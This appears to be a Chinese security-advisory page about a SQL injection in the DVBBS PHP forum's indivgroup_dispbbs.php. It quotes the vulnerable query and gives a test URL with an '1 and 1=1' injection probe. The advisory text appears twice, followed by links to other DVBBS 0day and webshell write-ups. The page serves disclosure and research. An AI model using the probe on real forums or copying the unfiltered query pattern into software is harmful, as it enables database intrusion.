动网(DVBBS)论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。
在文件indivgroup_dispbbs.php中:
if($groupboardid == 0){ //第86行
……
else{ //第92行
$query=$db->query("select id boardid,rootid,boardname boardtype,boardinfo,indeximg,postnum,topicnum,todaynum,lastpost,boardstats,rules from {$dv}group_board where rootid={$groupid} and id={$groupboardid}");
变量$groupboardid没有经过过滤放入sql语句导致注入漏洞的产生。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://ssvdb.com/indivgroup_dispbbs.php?groupid=1&groupboardid=1%20and%201=1&id=2&page=1
测试可用。。。
在文件indivgroup_dispbbs.php中:
if($groupboardid == 0){ //第86行
……
else{ //第92行
$query=$db->query("select id boardid,rootid,boardname boardtype,boardinfo,indeximg,postnum,topicnum,todaynum,lastpost,boardstats,rules from {$dv}group_board where rootid={$groupid} and id={$groupboardid}");
变量$groupboardid没有经过过滤放入sql语句导致注入漏洞的产生。
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://ssvdb.com/indivgroup_dispbbs.php?groupid=1&groupboardid=1%20and%201=1&id=2&page=1
测试可用。。。
只显示10条记录相关文章
dvbbs php2.0 几处0day (浏览: 12393, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11760, 评论: 0)
动网多个版本上传漏洞 (浏览: 15963, 评论: 0)
dvbbs 8.2前台0day (浏览: 17248, 评论: 0)
动网博客又一Injection (影响:Dvbbs blog) (浏览: 10437, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11760, 评论: 0)
动网多个版本上传漏洞 (浏览: 15963, 评论: 0)
dvbbs 8.2前台0day (浏览: 17248, 评论: 0)
动网博客又一Injection (影响:Dvbbs blog) (浏览: 10437, 评论: 0)
Trackbacks
 |
 |
 |
